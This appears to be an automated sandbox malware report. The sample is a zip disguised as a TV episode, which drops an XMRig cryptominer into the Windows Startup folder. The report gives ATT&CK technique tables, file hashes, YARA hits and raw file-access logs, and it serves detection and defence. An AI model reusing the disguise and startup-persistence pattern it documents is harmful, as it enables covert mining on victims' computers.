        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\SRPData.xml VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\backstack.json VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-100_contrast-black.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\System32\RuntimeBroker.exe VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-100_contrast-black.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppList.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppList.scale-100.png VolumeInformation
        Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-100_contrast-black.png VolumeInformation
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Query Registry
        Remote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        13
        Virtualization/Sandbox Evasion
        LSASS Memory12
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Process Injection
        Security Account Manager13
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Rundll32
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe100%AviraPUA/GM.Miner.ES
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe100%AviraPUA/GM.Miner.ES
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0017.t-0009.fb-t-msedge.net
        13.107.253.45
        truefalse
          unknown
          settings-ssl.xboxlive.com
          unknown
          unknowntrue
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            184.28.89.167
            unknownUnited States
            16625AKAMAI-ASUSfalse
            95.101.148.7
            unknownEuropean Union
            20940AKAMAI-ASN1EUfalse
            13.107.253.45
            s-part-0017.t-0009.fb-t-msedge.netUnited States
            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1541165
            Start date and time:2024-10-24 14:28:00 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsinteractivecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • EGA enabled
            Analysis Mode:stream
            Analysis stop reason:Timeout
            Sample name:From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip
            Detection:MAL
            Classification:mal76.evad.mine.winZIP@10/18@1/4
            Cookbook Comments:
            • Found application associated with file extension: .zip
            • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 95.101.148.7, 184.28.89.167
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Timeout during stream target processing, analysis might miss dynamic analysis data
            • VT rate limit hit for: From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip
            Process:C:\Windows\System32\Taskmgr.exe
            File Type:ASCII text, with no line terminators
            Category:modified
            Size (bytes):4
            Entropy (8bit):1.5
            Encrypted:false
            SSDEEP:
            MD5:F49655F856ACB8884CC0ACE29216F511
            SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
            SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
            SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
            Malicious:false
            Reputation:unknown
            Preview:EERF
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1520
            Entropy (8bit):5.0183726539703795
            Encrypted:false
            SSDEEP:
            MD5:E72FC6D9DAF66E2D8BC9FE37BE8CE4D8
            SHA1:667F95190910D5841E4531330001423CBB8E2030
            SHA-256:B5CCAFA927AF87CEA7E85A2D197C2E841E557B87900665C12FA6F8059B8B9356
            SHA-512:5D56979DBDB586601570DB6AEE666EA1DF489F3EB25285DEDC4A216834955E590158058D6B0C23D084C6C059AD91CF7B7FC32436E572693A96527F3D6E14160C
            Malicious:false
            Reputation:unknown
            Preview:<?xml version="1.0" encoding="utf-8"?>..<clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1">.. <targetedClient>XblWinClient</targetedClient > .. <rights>Copyright (c) Microsoft Corporation. All rights reserved.</rights>.. <configuration name="Playback" minBuild="16122.1018">.. <property name="UseAdaptiveMediaSourcePercent" value="50" type="int32"/>.. <property name="UseDashContentForMBRSourcePercent" value="100" type="int32"/>.. </configuration>.. <configuration name="Playback" minBuild="16122.1018" maxBuild="17032.1033">.. <property name="UseDashContentForMBRSourcePercentBeforeRS2" value="0" type="int32"/>.. </configuration>.. <configuration name="Playback" minBuild="17032.1034">.. <property name="UseDashContentForMBRSourcePercentBeforeRS2" value="100" type="int32"/>.. </configuration>.. <configuration name="Groveler" minBuild="17063.0" maxBuild="17082.9999">..
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:data
            Category:dropped
            Size (bytes):528384
            Entropy (8bit):0.013355427241676309
            Encrypted:false
            SSDEEP:
            MD5:C3593F2FDFB3A7FF40BDB47365B65BF6
            SHA1:AC2122EA3BA90C903519F69BA033B5F6D07CD5D8
            SHA-256:4D3C7D39CC31CDF3E5206B4AE1B7B2EA438526D7DB668F71DEB32A1FA3CB971C
            SHA-512:383E8173497134AB6186B04348D9F2E3DBFF11542F95F885FBFF66FC2083C586777246B59D8B01BA489F93ADE6B8104108261C2E7289397B856EED0EF2F57E65
            Malicious:false
            Reputation:unknown
            Preview:........A.s..%-.i...0...........r..k.&..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc217fad2, page size 8192, DirtyShutdown, Windows version 10.0
            Category:dropped
            Size (bytes):3670016
            Entropy (8bit):0.2478137060813267
            Encrypted:false
            SSDEEP:
            MD5:6386474C5931AD780D75C893060DC4A4
            SHA1:2223C7E03F969A0F28C91256DAB9B300FCD3637C
            SHA-256:B6904710A42ABDA652491B75530DFC97289CA97A4C6E3C1CC7ABDDB639CC566A
            SHA-512:4AACA2CDD6736CA53AAF2EE913EABC2CFFDBBDE8368768B15011A76AED970C33C76AC36A41A3E51522012E575D711C929FD976A6261D96307A615A7A559741A5
            Malicious:false
            Reputation:unknown
            Preview:....... .......-........)g(....|C.....................................(....|..h............................VaX(....|G.........................................................................................................eJ........... ...................................................................................................... .......(....|G.............................................................................................................................................................................................)....|y.................................Z..Z)....|.*.................8.(....|..........................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:data
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):0.09641745590098882
            Encrypted:false
            SSDEEP:
            MD5:5524AD731AF878D7DB344AAA0EA43632
            SHA1:93574DB6A1BE884800FB95F8E32F7E50306A18DF
            SHA-256:9CC6B300293DE757F16E6BA914CC4C034228A42CAEB861773A6DDD282DED6DF3
            SHA-512:410DFA1D61D477CC6AF37B73B19B72EF95227C44E6129FD33ED5A694FE2ADF7481337F1009B0C2C3AF8348732B390792A5BE05EB679DAC3CA0FA21DFACBC6849
            Malicious:false
            Reputation:unknown
            Preview:i.......................................(....|C.(....|C.................(....|..........G3..(....|...................8.(....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:COM executable for DOS
            Category:dropped
            Size (bytes):8192
            Entropy (8bit):0.6155185727427548
            Encrypted:false
            SSDEEP:
            MD5:A09E6D81652A890CCF808E3B2D765DA2
            SHA1:1ED4F1E9BC96201ADBF9511D04E369CF97A891DC
            SHA-256:E64EAE921AD41E50AB33B465294649B84B84B49B6B75D8E0372E45E4DF46EADF
            SHA-512:A386347C73FCDDAF7335443D9020183810368C231FC9319D58CC28A3CA9A382F928DE75DFB1102D5C7078744DF18E06F5A9B79C5F9F2935577A0CB68C7004B40
            Malicious:true
            Reputation:unknown
            Preview:.....................VaX(....|G.................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\.................................................................................................................................................................0u..,.....................5w.................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:data
            Category:dropped
            Size (bytes):2097152
            Entropy (8bit):0.684909788795052
            Encrypted:false
            SSDEEP:
            MD5:A0F346964EFCD30574B26C9C5DE4279F
            SHA1:A0B70A998A6163BED231FA61245AC48726EACAD7
            SHA-256:AE38198A249CCB419F03408B3FA5D370E0B5A8FD07192BACAC9222AA67EF266D
            SHA-512:C1F63C95C03DB66B3A2BEFFF103F46517713899AB4F38E20DC734BCAC779E8EDE6B88E9578FB25E5261CC6316A1C7B71594D048FF601C05B8E5ED5828268055E
            Malicious:false
            Reputation:unknown
            Preview:'K............. (....|G......................VaX(....|G.................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\.................................................................................................................................................................0u..,.....................5w.......................................#.................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:data
            Category:dropped
            Size (bytes):2097152
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:B2D1236C286A3C0704224FE4105ECA49
            SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
            SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
            SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
            Malicious:false
            Reputation:unknown
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6678def3, page size 8192, JustCreated, Windows version 0.0
            Category:dropped
            Size (bytes):262144
            Entropy (8bit):0.02039142562815523
            Encrypted:false
            SSDEEP:
            MD5:EF8754F58C318864778E350B1BD950C6
            SHA1:59BFCE6790EB9063F3D2CA60CDDD37B250D17060
            SHA-256:23A6F1AE3479C761D7D2B0BF81219368C3B9CE999306158B80DFBD711127234D
            SHA-512:25FBA17CF8EBD9637F5505D09E9805BCB45BA36E7D07DB1D51EAA96E74135F690CC2CDC07C014140E3FF27AF7450A3AC0CBA4C14B45EE5CA0FA3727701B3C602
            Malicious:false
            Reputation:unknown
            Preview:fx..... .......@..........(....|........................................................................................................................................................................................................... ...................................................................................................... .....................................................................................................................................................................................................................................................q~(....|.;....................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):0
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:7B730C8AC0AC9A84959341ED4556E660
            SHA1:2ACAB75EC054540C21F1BDCDF7FBB5063F5F2150
            SHA-256:273C04BEC221B177D09CCEB5B5B686FA7FAE25221D6748B448CF9D798ED43283
            SHA-512:55C96A06C6FF0E971EF09674E624EEB89D230DA2F3E3FCDB3EB9E9920051DA828983AFCBBCA0690043B6ADD352F1F02F120508FBB823CF7C2BDE229905108832
            Malicious:false
            Reputation:unknown
            Preview:<SRPData version="1" sessionId="1"><Outcomes><Outcome id="videoCompleted" timesOccurred="0" /></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="24" monthOfLastLaunch="10" yearOfLastLaunch="2024" userHasAccepted="false" timesPolled="0"/></SRPData>
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):265
            Entropy (8bit):4.855175721763919
            Encrypted:false
            SSDEEP:
            MD5:7B730C8AC0AC9A84959341ED4556E660
            SHA1:2ACAB75EC054540C21F1BDCDF7FBB5063F5F2150
            SHA-256:273C04BEC221B177D09CCEB5B5B686FA7FAE25221D6748B448CF9D798ED43283
            SHA-512:55C96A06C6FF0E971EF09674E624EEB89D230DA2F3E3FCDB3EB9E9920051DA828983AFCBBCA0690043B6ADD352F1F02F120508FBB823CF7C2BDE229905108832
            Malicious:false
            Reputation:unknown
            Preview:<SRPData version="1" sessionId="1"><Outcomes><Outcome id="videoCompleted" timesOccurred="0" /></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="24" monthOfLastLaunch="10" yearOfLastLaunch="2024" userHasAccepted="false" timesPolled="0"/></SRPData>
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):0
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:9FB4B8F544665CF8BE5B2450D05AE0DA
            SHA1:9F9B48784328F0AE066F8791BECF3311DDDABF7B
            SHA-256:8FE9B9AD175E9F551AF63F7F55D42219AC16BE4A6CF924135928C8D38714A49E
            SHA-512:EF438B0E96A4EEAB257D7111020E895F11F16E2B3B3DD48870EE46C88029A57C159472969B30DE39C4FD2D6CAB8AD184ABAEA102813CEFC50D6C8FCBE94C6B24
            Malicious:false
            Reputation:unknown
            Preview:{"version":"10.19071.19011.0","backstack":[{"type":"MS.Entertainment.Video.MyVideoGalleryPage","transition":0,"link":"mswindowsvideo://location/?id=videoLibrary"}]}
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):164
            Entropy (8bit):4.876294438813235
            Encrypted:false
            SSDEEP:
            MD5:9FB4B8F544665CF8BE5B2450D05AE0DA
            SHA1:9F9B48784328F0AE066F8791BECF3311DDDABF7B
            SHA-256:8FE9B9AD175E9F551AF63F7F55D42219AC16BE4A6CF924135928C8D38714A49E
            SHA-512:EF438B0E96A4EEAB257D7111020E895F11F16E2B3B3DD48870EE46C88029A57C159472969B30DE39C4FD2D6CAB8AD184ABAEA102813CEFC50D6C8FCBE94C6B24
            Malicious:false
            Reputation:unknown
            Preview:{"version":"10.19071.19011.0","backstack":[{"type":"MS.Entertainment.Video.MyVideoGalleryPage","transition":0,"link":"mswindowsvideo://location/?id=videoLibrary"}]}
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):1.8950419586297633
            Encrypted:false
            SSDEEP:
            MD5:6522D526ECC906AE27BB635ED6188072
            SHA1:36BED84FDA553B08B0E67403301019B20A4A5855
            SHA-256:E58D450FBA6E4B257B956EAA97126415C91742C2001FFB200AF3C83B4FF156BB
            SHA-512:7B610D63E2CE4904B2E17E36270692F7E21D0ACED6F99D3EB66E72901C29E46DFBF2C441E94C8563518645287FEFDA8C3FB5419D4008A3E1AC6ED674E3B46EF2
            Malicious:false
            Reputation:unknown
            Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmF..e.&...............................................................................................................................................................................................................................................................................................................................................nf.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):12288
            Entropy (8bit):2.424291203109563
            Encrypted:false
            SSDEEP:
            MD5:AD7C5927105CFE66E3E0843016740275
            SHA1:C4A8E825685FDA8B515F726BBEB9ABD0B3CBF51F
            SHA-256:1A15B5B6AB450C542125152AED60FB59D684BD275B7C941866EE297A123FCB0B
            SHA-512:83C594F1645FA934BE86E60C8A3E1D0E08FB92E432C52DBC4AD665E071C1552F0978CA540035A8384EA067BD67F81CB3F557C61D5D278C5C90B116C25C7A9655
            Malicious:false
            Reputation:unknown
            Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmF..e.&...............................................................................................................................................................................................................................................................................................................................................nf.HvLE............. ......4!.W..?G..^.U....... ..hbin................b.Q.7..........nk,.T...7......h...........................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk .{`.l.&..................................h...............................Configuration...p...sk..x...x.......t.......H...X.............4.........?.......................
            Process:C:\Windows\System32\cmd.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):2
            Entropy (8bit):1.0
            Encrypted:false
            SSDEEP:
            MD5:81051BCC2CF1BEDF378224B0A93E2877
            SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
            SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
            SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
            Malicious:false
            Reputation:unknown
            Preview:..
            Process:C:\Windows\System32\cmd.exe
            File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
            Category:dropped
            Size (bytes):10968268
            Entropy (8bit):6.64199633931364
            Encrypted:false
            SSDEEP:
            MD5:164093994D90CC1A8B15D96351665A54
            SHA1:18E88C3C12A1A160650A15AD01F3504629594581
            SHA-256:100D3E583024371BE3A42A57073EA19732A03C543B15551FAF583517A9BBE912
            SHA-512:962171B7E813F52257F30FDB81B4D9048864BB9AD73192FD380EDDB5B205D262506A5A32FE11D93279C4D4B8CDEA3B41A15CE8A111408EA8AD6400AD85AADF0D
            Malicious:true
            Yara Hits:
            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: Joe Security
            • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: unknown
            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: unknown
            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: Joe Security
            • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: unknown
            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, Author: unknown
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:unknown
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g...............+..b......(2............@............................. ............`... .................................................xE...........0z.................4...........................@6x.(....................................................text.....b.......b.................`..`.data.........c.......c.............@....rdata........d.......c.............@..@.pdata.......0z.......z.............@..@.xdata..<.... }.......|.............@..@.bss.....&2..............................idata..xE.......F..................@....CRT....h....`.....................@....tls.........p......................@....rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................
            Process:C:\Program Files\7-Zip\7zG.exe
            File Type:MS Windows shortcut, Item id list present, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
            Category:modified
            Size (bytes):1098600848
            Entropy (8bit):0.13661739411998505
            Encrypted:false
            SSDEEP:
            MD5:A855858B5F3D8F3B64CB9E16B722CEA1
            SHA1:8A0119BA1DA372FDB705A09B3E5783368809E4EC
            SHA-256:810E2CF374B37025543B656BE050BE161E325B1108DC0F93BC2952489E6698DE
            SHA-512:2601DBACCABA931CE9DBCECE0F607957F3566A1A8B4A9A66D28DB199FF0B7349C3268CEC1B852FE9570F0AE770305DEBCE8911B065742DEF9ED475C2F3FE56BA
            Malicious:false
            Reputation:unknown
